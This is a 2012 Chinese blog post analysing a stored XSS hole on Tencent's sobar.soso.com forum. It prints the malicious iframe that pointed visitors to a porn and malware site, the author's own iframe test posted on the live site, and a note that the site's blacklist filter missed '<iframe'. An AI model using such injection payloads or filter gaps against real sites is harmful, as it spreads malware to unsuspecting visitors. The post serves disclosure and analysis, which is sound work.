搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞。

本文只是一篇漏洞追踪分析文章,并没有太多的技术含量,无论您是老鸟还是菜鸟,均可阅读。


在晚上十点多的时候,也就是刚刚,几小时之前……

看美剧看的正爽的时候(由于这个事件,暂停到现在……),某好友忽然告知:搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!!!!!

原因是当他打开该站某个连接的时候,莫名其妙的弹出来色情广告,并且页面跳转到一个色情网站,同时金山卫士报毒,http://sobar.soso.com 伪装成色情网站传播木马……

如下图:

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

提示:点击图片可以查看高清大图

可以看到,那个连接是:

http://sobar.soso.com/t/88441571

http://sobar.soso.com/t/88441571?cid=t3.mail.bar

(警告:以上链接已被挂马,请勿访问!!!!)

于是,我打开了这个连接,但是并没有发现异常,只是一个关于“猥琐男”的三流新闻……

于是,我怀疑是他网络问题(这个草草的判断 + 一个特殊的原因,导致我绕了很多弯路,地下会讲),于是乎要他发QQ远程协助,然后进行检查……

远程操作了几十分钟后,排除了以下可能:

1、DNS 劫持。

2、Arp 欺骗。

3、ISP 劫持,推送广告,ISP = Internet 服务提供商,例如:电信、网通、联通……

4、SPI (LSP) 劫持,以及机器中毒、中木马。

具体过程比较繁琐,而且还是绕的弯路,所以这里就不费话了,直接跳过……

然后,正在郁闷的时候,忽然想到可能是腾讯被挂马了,于是又回过头来检查页面源码……

进行了一些操作后,终于找到了挂马的位置,挂马代码片段如下(为了方便阅读,代码进行过格式化):

…… 省略 ……
<p class="post_info">
    <span class="post_time">发表于 2012-04-14 07:33:00</span>
    <span class="post_floor"><em>15</em></span>
</p>
<div class="post_content_comm">
    <div>
        <iframe src="http://wvw.vizvaz.com/" frameborder="“0”" scrolling="yes" height="100px" width="100px"></iframe>
        <div><font size="3">更希望警方关注此事。</font></div>
        <div class="send_tips" style="margin-top:35px;"><p>本贴于2012-04-14 22:15:56被(<a href="/u/2623766127" target="_blank">杨雨诗</a>)编辑</p></div>
    </div>
</div>
<div class="evaluation_wrap_s">
    <span class="post_re"><a href="javascript:void(0);">回复</a></span>
    <span class="post_ref"><a href="javascript:void(0);">引用</a></span>
…… 省略 ……

注意这行:

<iframe src="http://wvw.vizvaz.com/" frameborder="“0”" scrolling="yes" height="100px" width="100px"></iframe>

挂马者使用框架页面插入了一个非法网站,如下图:

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

我这里的显示状态,注意:目标网站是无法打开状态!

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

朋友的显示状态,目标网站为打开状态!

注意上边两个小小的差别,我这里无法打开目标网站,而他那里是可以打开的,这是那个挂马网站的问题,也是之前误导了我绕了一大圈,关于这个网站,稍后再说,现在先看腾讯的问题……

于是我使用这段 Html 代码进行了测试,效果如下:

<iframe height="200" src="https://lcx.cc/" frameBorder="“0”" width="500" scrolling="yes"></iframe>
<p>Just Test...</p>
<p>By: Nuclear'Atk, At: 2012-4-14 23:34:54.</p>

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

登录状态,XSS 代码完美执行

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

匿名状态,XSS 代码也完美执行

可以看到,完美的插入并执行了 XSS 代码,各位同学可以去围观,地址为:

http://sobar.soso.com/t/88441571?fl=172#f172,第 172 楼(尼玛,Master 在底下挂了他的百度博客,而百度他妈的直接跳转的,所以你看不到效果了……)。

我对这个 XSS 感到很蛋疼,然后又做了粗略的测试,发现只过滤了“<script”、“<frame”、"<img onerror=" 等标签……

而这个“<iframe”居然被忽略了???莫非是用的简单的黑名单规则匹配??而且还是腾讯这样的大企业???对此我倍感震惊……

介于这个安全程度,我也就没继续做测试了,不出意外的话,应该很容易会找出来其他 XSS 点……

对腾讯工程师的点评:我能说脏话吗? 不能吗? 那我就没话好说了……

╮(╯_╰)╭

 

接下来看哪个挂马网站,地址如下:

http://wvw.vizvaz.com/

http://wvw.vizvaz.com/av.htm

域名:wvw.vizvaz.com,IP:174.139.83.179,归属地:美国 圣安娜Krypt机房

绝对是个美国 VPS,谁感兴趣,可以去日了他……

对其 IP 进行了反查,结果如下:

└─项目1
  └─174.139.83.179 [Unknow OS] {Unknow Web Services}
    └─http://ll.ninth.biz/se/:【成人电影】_【成人伦理片】_【激情电影 ...
    └─http://rr.dumb1.com/se/play.html:高清影院-免费伦理电影免费在线观看
    └─http://kmnn.info/52/av.htm:情|色|电|影|黄|色|片|成|人|网|站|东|京|热|www.5dx ...
    └─http://rr.dumb1.com/se/play_files/you1.htm:高清影院-免费成人电影免费在线观看
    └─http://ll.ninth.biz/se/chengrendongman.html:成人动慢____成人动漫导航____好看的成人动漫电影

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

可以看到,全部都是色情网站,并且有挂马痕迹,看来是个职业的家伙……

可奇怪的是,该 IP 可以 Ping 通:

C:\>ping 174.139.83.179

正在 Ping 174.139.83.179 具有 32 字节的数据:
来自 174.139.83.179 的回复: 字节=32 时间=220ms TTL=115
来自 174.139.83.179 的回复: 字节=32 时间=224ms TTL=115
来自 174.139.83.179 的回复: 字节=32 时间=222ms TTL=115
来自 174.139.83.179 的回复: 字节=32 时间=221ms TTL=115

174.139.83.179 的 Ping 统计信息:
    数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
    最短 = 220ms,最长 = 224ms,平均 = 221ms

但是无法连接 80 端口, 我是电信网络,我朋友是广东省广州市长城宽带,他可以访问,可能是对方做了策略之类的,或者是机房线路问题(可能性不大),不知道是故意的还是无意的……

最后,综合网上的信息来看,此漏洞出来不超过两天,并且已有数人中招,这次发现纯属偶然,还算及时……

以腾讯这么庞大的用户群来看,腾讯这次需要紧急修复了……

此事基本告一段落了,如果还有后续报道,我会更新的……

乌云:

http://www.wooyun.org/bugs/wooyun-2010-06064

http://www.wooyun.org/bugs/wooyun-2010-06064/trace/efdcddcc0478b92fc8e09ca544cb8d8d

备注:

此漏洞危害甚大,已报告至腾讯,腾讯估计会在近期内修复,大家还可以没事玩玩……

2012-4-15 1:26:11 补充:

惊爆!搜搜搜吧——腾讯旗下最大社区(sobar.soso.com)被挂马!搜搜搜吧,腾讯旗下最大社区(sobar.soso.com),储存型持久 XSS 漏洞

黑产的人手脚真快……


2012-04-16 09:51:36 补充:

腾讯已于 2012-04-15 进行了修复,之前挂的帖子都有过修改。

留言评论(旧系统):

【匿名者】 @ 2012-04-15 01:09:05

真人秀吧 点击率更高。呵呵

本站回复:

神马真人秀……

落雪依然 @ 2012-04-15 06:46:48

你以前的图像就够坑的了,,,现在。。。还是相当坑。。。

本站回复:

坑……你妹啊。。。

九区外观大队队长 @ 2012-04-16 09:45:00

公鸡你怎么能发这么不和谐的内容呢?立即把所有不和谐的网址发给我,我要认真的批判他们。

本站回复:

http://www.qs99w.com/ ╮(╯_╰)╭

【匿名者】 @ 2012-04-17 19:51:47

不玩腾讯那个玩意,貌似XSS要配给力IE0day才能发挥最大危害。当年的QQ邮箱跨站。

本站回复:

QQ邮箱跨站确实很多,刚刚乌云还有人提交了两个QQ邮箱跨站。

【匿名者】 @ 2012-04-21 13:03:57

“http://sobar.soso.com/t/88441571?fl=172#f172,第 172 楼(尼玛,Master 在底下挂了他的百度博客,而百度他妈的直接跳转的,所以你看不到效果了……)。 ” 弱弱的问一句。如何,实现百度博客这种效果?

本站回复:

晕,简单的父窗口跳转而已,百度博客默认是跳转到:/home/,这种问题就不要问了,基础实在是太差了……

晴天小铸 @ 2012-07-06 09:27:44

刚出没多久的时候 我在wooyun学到的xss绕过知识和自己总结的成功绕过黑名单-_-。IE内核下有效果,现在不知道还黑名单不

本站回复: